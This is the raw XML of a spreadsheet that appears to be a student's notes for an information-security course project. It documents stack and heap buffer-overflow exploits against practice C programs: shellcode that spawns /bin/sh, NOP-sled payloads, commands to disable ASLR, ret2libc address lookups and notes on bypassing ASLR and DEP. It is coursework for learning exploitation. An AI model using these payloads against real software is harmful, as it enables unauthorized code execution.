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0\Desktop\GitHub\GT\CS 6035 Introduction to Information Security\Project1\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="28770" windowHeight="14025"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
  </sheets>
  <calcPr calcId="162913"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="180" uniqueCount="155">
  <si>
    <t>Source Code</t>
  </si>
  <si>
    <t>Shellcode</t>
  </si>
  <si>
    <t>#include &lt;stdio.h&gt;</t>
  </si>
  <si>
    <t>#include &lt;string.h&gt;</t>
  </si>
  <si>
    <t>int main(int argc, char *argv[])</t>
  </si>
  <si>
    <t>{</t>
  </si>
  <si>
    <t>char buf[256];</t>
  </si>
  <si>
    <t>strcpy(buf, argv[1]);</t>
  </si>
  <si>
    <t>printf("%s\n", buf);</t>
  </si>
  <si>
    <t>return 0;</t>
  </si>
  <si>
    <t>}</t>
  </si>
  <si>
    <t>Stack Layout</t>
  </si>
  <si>
    <t>4 bytes</t>
  </si>
  <si>
    <t>Bottom of Stack or Higher Memory Address</t>
  </si>
  <si>
    <t>Stack flows up to lower memory</t>
  </si>
  <si>
    <t>Heap flows down to higher memory</t>
  </si>
  <si>
    <t>Top or Lower Memory Addresses</t>
  </si>
  <si>
    <t>Bottom or Higher Memory Address</t>
  </si>
  <si>
    <t>256 bytes</t>
  </si>
  <si>
    <t>Task 1.1 Stack Overflow</t>
  </si>
  <si>
    <t>Task 1.2 Heap Overflow</t>
  </si>
  <si>
    <t>Task 2 Exploiting Buffer Overflow</t>
  </si>
  <si>
    <t>b main</t>
  </si>
  <si>
    <t>0x80487c3</t>
  </si>
  <si>
    <t>find &amp;system,+9999999,"/bin/sh"</t>
  </si>
  <si>
    <t>cd Desktop</t>
  </si>
  <si>
    <t xml:space="preserve">gcc sort.c -o sort -fno-stack-protector </t>
  </si>
  <si>
    <t>gdb sort</t>
  </si>
  <si>
    <t>frame pointer (ebp)</t>
  </si>
  <si>
    <t>echo 0 | sudo tee /proc/sys/kernel/randomize_va_space</t>
  </si>
  <si>
    <t>arg1</t>
  </si>
  <si>
    <t>arg2</t>
  </si>
  <si>
    <t>\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb</t>
  </si>
  <si>
    <t>\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89</t>
  </si>
  <si>
    <t>\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd</t>
  </si>
  <si>
    <t>\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68</t>
  </si>
  <si>
    <t>Top of Stack or Lower Memory Address</t>
  </si>
  <si>
    <t>buf[]</t>
  </si>
  <si>
    <t>Explaination</t>
  </si>
  <si>
    <t>Procedure</t>
  </si>
  <si>
    <t>gcc -o stack -fno-stack-protector -m32 -z execstack stack.c</t>
  </si>
  <si>
    <t>gdb stack</t>
  </si>
  <si>
    <t>disas main</t>
  </si>
  <si>
    <t>b *0x08048475</t>
  </si>
  <si>
    <t>r $(python -c "print('A'*256)")</t>
  </si>
  <si>
    <t>run $(python -c "print('A'*268)")</t>
  </si>
  <si>
    <t>run $(python -c "print('A'*272)")</t>
  </si>
  <si>
    <t>run $(python -c "print('A'*268+'BBBB')")</t>
  </si>
  <si>
    <t xml:space="preserve"> r $(python -c "print('\x90'*222+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b</t>
  </si>
  <si>
    <t>\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'\x60\xee\xff\xbf')")</t>
  </si>
  <si>
    <t>\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd</t>
  </si>
  <si>
    <t>&gt;Disable ASLR</t>
  </si>
  <si>
    <t>&gt;Find call</t>
  </si>
  <si>
    <t>&gt;Break below &lt;strcpy@plt&gt;</t>
  </si>
  <si>
    <t>&gt;Overflow stack with A's</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;Examine Starting Address </t>
  </si>
  <si>
    <t xml:space="preserve">&gt;Examine for the beginning of x41 (A), that is the starting address of the buffer: </t>
  </si>
  <si>
    <t>&gt;Quit gdb and re-run without breaks</t>
  </si>
  <si>
    <t>&gt;268 bytes of memory - 46 bytes of shell code = 222 NOPs</t>
  </si>
  <si>
    <t>&gt;Flood with NOPs and execute shellcode (using starting address 0xbfffee60 in endian hex): \x60\xee\xff\xbf</t>
  </si>
  <si>
    <t>&gt;Actual code</t>
  </si>
  <si>
    <t>&gt;process 2443 is executing new program: /bin/dash</t>
  </si>
  <si>
    <t>Heap Layout</t>
  </si>
  <si>
    <r>
      <t>int</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>main(int</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>argc, char</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>**argv)</t>
    </r>
  </si>
  <si>
    <t>a = malloc(32);</t>
  </si>
  <si>
    <t>b = malloc(32);</t>
  </si>
  <si>
    <t>strcpy(a, argv[1]);</t>
  </si>
  <si>
    <t>free(b);</t>
  </si>
  <si>
    <t>free(a);</t>
  </si>
  <si>
    <t>Shell Code</t>
  </si>
  <si>
    <t>\x68\x64\x88\x04\x08\xc3</t>
  </si>
  <si>
    <t>https://conceptofproof.wordpress.com/2013/11/19/protostar-heap3-walkthrough/</t>
  </si>
  <si>
    <t>References</t>
  </si>
  <si>
    <t>&gt;Break at main</t>
  </si>
  <si>
    <t>&gt;Find location of system()</t>
  </si>
  <si>
    <t>0xb7e56190</t>
  </si>
  <si>
    <t>&gt;Find fixed sh address</t>
  </si>
  <si>
    <t>./sort data.txt</t>
  </si>
  <si>
    <t>Breakpoint 1, 0x080487c3 in main ()</t>
  </si>
  <si>
    <t>r sort</t>
  </si>
  <si>
    <t>$1 = (&lt;text variable, no debug info&gt; *) 0xb7e56190 &lt;__libc_system&gt;</t>
  </si>
  <si>
    <t>0xb7f76a24</t>
  </si>
  <si>
    <t>p &amp;system</t>
  </si>
  <si>
    <t>&gt;Find exit address</t>
  </si>
  <si>
    <t>p exit</t>
  </si>
  <si>
    <t>$2 = {&lt;text variable, no debug info&gt;} 0xb7e491e0 &lt;__GI_exit&gt;</t>
  </si>
  <si>
    <t>0xb7e491e0</t>
  </si>
  <si>
    <t>&gt;Test shellcode</t>
  </si>
  <si>
    <t>x/200xb $esp</t>
  </si>
  <si>
    <t xml:space="preserve"> (examine/entry#/hex/byte $stack pointer)</t>
  </si>
  <si>
    <t>whoami</t>
  </si>
  <si>
    <t>date</t>
  </si>
  <si>
    <t>&gt;Comment out bubble_sort loop</t>
  </si>
  <si>
    <t>Task 3 Defeating ASLR and DEP</t>
  </si>
  <si>
    <t>http://security.stackexchange.com/questions/20497/stack-overflows-defeating-canaries-aslr-dep-nx</t>
  </si>
  <si>
    <t xml:space="preserve"> https://www.youtube.com/watch?v=hJ8IwyhqzD4</t>
  </si>
  <si>
    <t>http://security.stackexchange.com/questions/18556/how-do-aslr-and-dep-work</t>
  </si>
  <si>
    <t>http://www.h-online.com/security/features/Return-of-the-sprayer-exploits-to-beat-DEP-and-ASLR-1171463.html</t>
  </si>
  <si>
    <t>*Size of the overflowing buffer to reach return address</t>
  </si>
  <si>
    <t>return address (eip)</t>
  </si>
  <si>
    <t>&gt;Find the starting location of our program buffer in the memory</t>
  </si>
  <si>
    <t>&gt;Test for the size or number of bytes we need to overflow the buffer until we hit the return address</t>
  </si>
  <si>
    <t>&gt;Overflow buf[], and the frame pointer with NOPs.</t>
  </si>
  <si>
    <t>&gt;Navigate to Directory</t>
  </si>
  <si>
    <t>&gt;Run program in GDB</t>
  </si>
  <si>
    <t>&gt;Compile without Canaries</t>
  </si>
  <si>
    <t>q</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;Try 4 more B's to ensure error 0x42424242 </t>
  </si>
  <si>
    <t>SUCCESS!</t>
  </si>
  <si>
    <t>32 bytes</t>
  </si>
  <si>
    <t>forward pointer (fd)</t>
  </si>
  <si>
    <t>back pointer (bk)</t>
  </si>
  <si>
    <t>prev chunk size</t>
  </si>
  <si>
    <t>chunk size</t>
  </si>
  <si>
    <t>Notes</t>
  </si>
  <si>
    <r>
      <t>void</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>success()</t>
    </r>
  </si>
  <si>
    <t>printf("Success! @ %d\n", time(NULL));</t>
  </si>
  <si>
    <t>strcpy(b, argv[1]);</t>
  </si>
  <si>
    <r>
      <t>char</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>*a, *b;</t>
    </r>
  </si>
  <si>
    <t>printf("Failed!\n");</t>
  </si>
  <si>
    <t>&gt;Exploit free() to create a fake chunk inside buffer B</t>
  </si>
  <si>
    <t>&gt;Use unlink() to set the backpointer (bk) to the address of our NOP sled</t>
  </si>
  <si>
    <t>&gt;We will overwrite a GOT address (like ret with stacks) and make it point to a NOP sled</t>
  </si>
  <si>
    <t>&gt;Set a break to find the starting address of our NOP sled</t>
  </si>
  <si>
    <t>&gt;Overwrite the return address with the location of our shellcode and let the program slide until it executes</t>
  </si>
  <si>
    <t>&gt;Increase until we hit error 0x41414141</t>
  </si>
  <si>
    <t>&gt;Increase A's until Segmentation Fault</t>
  </si>
  <si>
    <t>4) prev chunk size is used ONLY if the previous chunk is free</t>
  </si>
  <si>
    <t>Overwritten Metadata</t>
  </si>
  <si>
    <t>2) In our code, both A and B are considered "Used Chunks" but A will be seen by the system as "Free"</t>
  </si>
  <si>
    <t>&gt;Use unlink() to set forward pointer (fd) to the address of puts()</t>
  </si>
  <si>
    <t>&gt;Run sort in GDB</t>
  </si>
  <si>
    <t>Unable to access 16000 bytes of target memory at 0xb7fc0dac, halting search. 1 pattern found.</t>
  </si>
  <si>
    <t>&gt;Comment back, and find new exit that stays between system and sh addresses</t>
  </si>
  <si>
    <t>0xb7ecbbc4</t>
  </si>
  <si>
    <t>Finding the new exit address that resisted sorting was SO sneaky. You guys are EVIL but AWESOME!</t>
  </si>
  <si>
    <t>&gt;By the same logic, we will also alter prev_size field with a negative value, distorting the starting location of fake chunk</t>
  </si>
  <si>
    <t>&gt;The Global Offest Table (GOT), stores pointers to function addresses in libc library at runtime for every process</t>
  </si>
  <si>
    <t>&gt;This allows B to run unlink(), thinking that chunk A is free (which is actually our exploit chunk!). Slide and execute shell</t>
  </si>
  <si>
    <t>3) We don't nessearily "overwrite" the fd and bk, but we will control and set/point them to a desired address/value</t>
  </si>
  <si>
    <t>1) Our code will overwrite the "previous chunk size" and "size" metadata of Used Chunk B to make previous Used Chunk A</t>
  </si>
  <si>
    <t>appear to be free. Chunk A will only have its "chunk size" overwritten by NOPs.</t>
  </si>
  <si>
    <t>Used Chunk A</t>
  </si>
  <si>
    <t>Used Chunk B</t>
  </si>
  <si>
    <t>free</t>
  </si>
  <si>
    <t>Free Chunk (as seen by the system)</t>
  </si>
  <si>
    <t>Overwritten Data</t>
  </si>
  <si>
    <t>fake chunk</t>
  </si>
  <si>
    <t>nops/shell/filler</t>
  </si>
  <si>
    <t>&gt;When B is freed, it will be fooled into thinking its previous chunk is also free, calling unlink()</t>
  </si>
  <si>
    <t>&gt;We do this by overwriting B's size field with a negative value, making it think Chunk A is free</t>
  </si>
  <si>
    <t>Papers from the project instruction</t>
  </si>
  <si>
    <t>Task 1.1 Source and Shell Codes</t>
  </si>
  <si>
    <t>Task 1.2 Source and Shell Codes</t>
  </si>
  <si>
    <t>Task 3 References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</si>
</sst>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font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF333333"/>
      <name val="Roboto"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF666666"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
  </fonts>
  <fills count="6">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFFFF"/>
        <bgColor rgb="FFFFFFFF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF0000"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFC000"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="7" tint="0.79998168889431442"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="3">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6">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="5" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="4" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1"/>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2</xdr:col>
      <xdr:colOff>438150</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>438153</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>9526</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="8" name="Straight Arrow Connector 7"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm flipH="1" flipV="1">
          <a:off x="2438400" y="4000500"/>
          <a:ext cx="3" cy="58102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514350</xdr:colOff>
      <xdr:row>58</xdr:row>
      <xdr:rowOff>47625</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>523875</xdr:colOff>
      <xdr:row>62</xdr:row>
      <xdr:rowOff>95250</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="4" name="Straight Arrow Connector 3"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4610100" y="11096625"/>
          <a:ext cx="9525" cy="80962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0</xdr:colOff>
      <xdr:row>159</xdr:row>
      <xdr:rowOff>28575</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>6</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>201</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="3" name="TextBox 2"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="0" y="30318075"/>
          <a:ext cx="6867525" cy="81248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ASLR (Assumes </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>DEP not being</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="1" baseline="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>concurrently active,</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="1" baseline="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="1"/>
            <a:t>32-bit</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="1" baseline="0"/>
            <a:t> OS, and no additional hardware protection, unless specified otherwise)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" b="1"/>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1100"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" marR="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPts val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
            <a:buClrTx/>
            <a:buSzTx/>
            <a:buFontTx/>
            <a:buNone/>
            <a:tabLst/>
            <a:defRPr/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1100"/>
            <a:t>ASLR randomizes the location of executables,</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" baseline="0"/>
            <a:t> libraries, and the buffer (stacks/heap). </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>This</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" baseline="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> stops us from knowing in advance where system()  or "/bin/sh" will be, thus breaking our libc attack in Task 2. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100"/>
            <a:t>The most common ways to defeat ASLR involves</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" baseline="0"/>
            <a:t>, probabilistic methods, brutforce and bypasses.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" marR="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPts val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
            <a:buClrTx/>
            <a:buSzTx/>
            <a:buFontTx/>
            <a:buNone/>
            <a:tabLst/>
            <a:defRPr/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1100"/>
            <a:t>1) Since ASLR protection does not extend to all processes, we can still execute our shellcode by overwriting the return address or EIP of non-ASLR modules using "jump esp." Classic examples include </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" baseline="0"/>
            <a:t>MSVCR71.DLL and HXDS.DLL which are not compiled in ASLR. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1100"/>
            <a:t>2) We can increase</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" baseline="0"/>
            <a:t> our chance of success by blindly duplicating</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100"/>
            <a:t> NOPs or copies of our exploit to reduce the amount of meaningful</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" baseline="0"/>
            <a:t> code on the memory and increase the chance of our shellcode landing on legitimate executable memory.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1100"/>
            <a:t>3) We can also bruteforce through all</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" baseline="0"/>
            <a:t> addresses of the target program by overflowing the buffer one address at a time. In this case, it doesn't really matter if the exact address is unknown to us as long as the program doesn't crash or memory locations are shifted. In a way, it's like doing Task 2 by permuting the addresses in data.txt until the shell executes, as the randomized addresses you will see in GDB would be meaningless. This approach involves luck as even a 32-bit system may require 0-4 GB of memory to be sniffed through. It may be almost impossible on a 64 bit systems with 16 exabytes of possible memory.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1100" baseline="0"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1100" baseline="0"/>
            <a:t>A recent example from Intel's  Haswell CPUs demonstrated a  BTB vulnerability. The Branch Target Buffer, used by the CPU can be manipulated to leak ASLR addresses by triggering BTB collisions between different user and kernel processes. The BTB stores addresses of recently executed instructions, to improve performance. Since it's shared by several processes, memory leakage from one application can allow us to figure out where addresses of specific codes are located.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1100" baseline="0"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="1" baseline="0"/>
            <a:t>DEP </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>(Assumes ASLR not being</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="1" baseline="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>concurrently active,</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="1" baseline="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>32-bit</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="1" baseline="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> OS, and no additional hardware protection, unless specified otherwise)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:effectLst/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1100" b="1" baseline="0"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="0" baseline="0"/>
            <a:t>DEP marks certain regions of the memory and stack as non-executable. This blocks the buffer from executing calls that point to an external shell. We can tackle this complication using Return-Oriented Programming.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" marR="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPts val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
            <a:buClrTx/>
            <a:buSzTx/>
            <a:buFontTx/>
            <a:buNone/>
            <a:tabLst/>
